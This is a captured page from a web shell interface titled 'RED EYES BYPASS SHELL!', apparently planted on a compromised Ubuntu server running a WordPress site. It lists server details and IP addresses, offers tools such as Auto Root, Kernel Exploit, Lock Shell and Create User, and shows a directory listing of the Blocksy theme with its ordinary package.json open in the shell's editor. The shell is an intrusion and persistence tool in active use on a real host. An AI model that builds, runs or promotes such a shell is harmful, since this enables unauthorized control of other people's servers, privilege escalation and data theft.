Linux sothorn202 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
wp900 /
Test_FMS /
wp-content /
themes /
blocksy /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
admin
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
static
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
tutor
[ DIR ]
drwxr-xr-x
woocommerce
[ DIR ]
drwxr-xr-x
404.php
662
B
-rw-r--r--
LICENSE
17.62
KB
-rw-r--r--
archive.php
344
B
-rw-r--r--
changelog.txt
172.5
KB
-rw-r--r--
comments.php
2.53
KB
-rw-r--r--
footer.php
527
B
-rw-r--r--
functions.php
326
B
-rw-r--r--
gulpfile.js
15.66
KB
-rw-r--r--
header.php
1.36
KB
-rw-r--r--
index.php
466
B
-rw-r--r--
package.json
2.8
KB
-rw-r--r--
page.php
395
B
-rw-r--r--
readme.txt
7.32
KB
-rw-r--r--
screenshot.jpg
363.97
KB
-rw-r--r--
searchform.php
8.51
KB
-rw-r--r--
sidebar.php
409
B
-rw-r--r--
single.php
358
B
-rw-r--r--
style.css
1.39
KB
-rw-r--r--
theme.json
1.41
KB
-rw-r--r--
wpml-config.xml
4.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "small-ct", "version": "2.0.80", "title": "Blocksy", "browserslist": "> 1%, not opera > 0, not op_mini all", "devDependencies": { "@babel/plugin-transform-parameters": "^7.13.0", "@octokit/core": "^3.2.5", "babel-jest": "^29.7.0", "babel-plugin-lodash": "^3.3.4", "ct-build-process": "^5.4.12", "env-cmd": "^10.1.0", "gulp-remove-code": "^3.0.4", "jest": "^29.7.0", "negotiator": "^0.6.2", "webpack-bundle-analyzer": "^3.8.0" }, "scripts": { "dev": "gulp dev --silent", "build": "cross-env NODE_ENV=production gulp build --silent", "gettext-generate": "gulp gettext-generate --silent", "deploy:staging": "scripts/deploy-staging.sh demo.creativethemes.com staging/wp-content", "deploy:speed-test": "scripts/deploy-staging.sh demo.creativethemes.com speed-test/wp-content", "deploy:tutorial": "NODE_ENV=production gulp build_zips && scp build_tmp/*-production.zip root@demo.creativethemes.com:/var/www/html && ssh root@demo.creativethemes.com 'cd /var/www/html && mv *-production.zip tutorial/wp-content/themes/ && cd tutorial/wp-content/themes && rm -rf blocksy && unzip *-production.zip && rm *-production.zip'", "changelogs": "env-cmd --silent node scripts/get-changelog.js", "get-next-version": "node scripts/get-next-version.js", "set-version": "node scripts/set-version.js", "make-nightly": "scripts/make-nightly.sh", "make-release": "scripts/make-release.sh", "create-github-release": "env-cmd --silent node scripts/create-github-release.js", "sync-google-fonts": "env-cmd --silent node scripts/sync-google-fonts.js", "make-pr": "env-cmd --silent node scripts/make-pr.js", "test": "NODE_ENV=test jest" }, "dependencies": { "@reach/dialog": "^0.1.2", "@reach/router": "^1.3.4", "@wordpress/components": "^25.7.0", "@wordpress/date": "^3.2.0", "@wordpress/i18n": "^3.0.1", "@wordpress/icons": "^6.1.1", "array-move": "^2.1.0", "bezier-easing": "^2.1.0", "body-scroll-lock": "^3.1.5", "classnames": "^2.2.6", "colord": "^2.9.2", "cross-env": "^7.0.3", "ct-log": "^1.0.0", "ct-wordpress-helpers": "^0.0.4", "ct-wp-js-log": "^1.0.4", "customizer-sync-helpers": "^2.0.6", "deep-equal": "^1.0.1", "dom-chef": "^3.3.0", "downshift": "^6.0.6", "fast-deep-equal": "^3.1.3", "file-saver": "^2.0.0-rc.4", "flexy": "git+ssh://git@github.com:sergiu-radu/flexy.git", "gradient-parser": "^1.0.2", "infinite-scroll": "^4.0.1", "match-conditions": "^1.0.16", "md5": "^2.2.1", "nanoid": "^2.0.0", "react-beautiful-dnd": "^13.1.1", "react-copy-to-clipboard": "^5.1.0", "react-sortable-hoc": "^1.8.3", "react-spring": "^9.7.4", "react-virtualized-auto-sizer": "^1.0.2", "react-window": "^1.8.2", "remove-accents": "^0.5.0", "scriptjs": "^2.5.9", "simple-linear-scale": "^1.0.1", "use-force-update": "^1.0.4", "webfontloader": "^1.6.28" } }
Close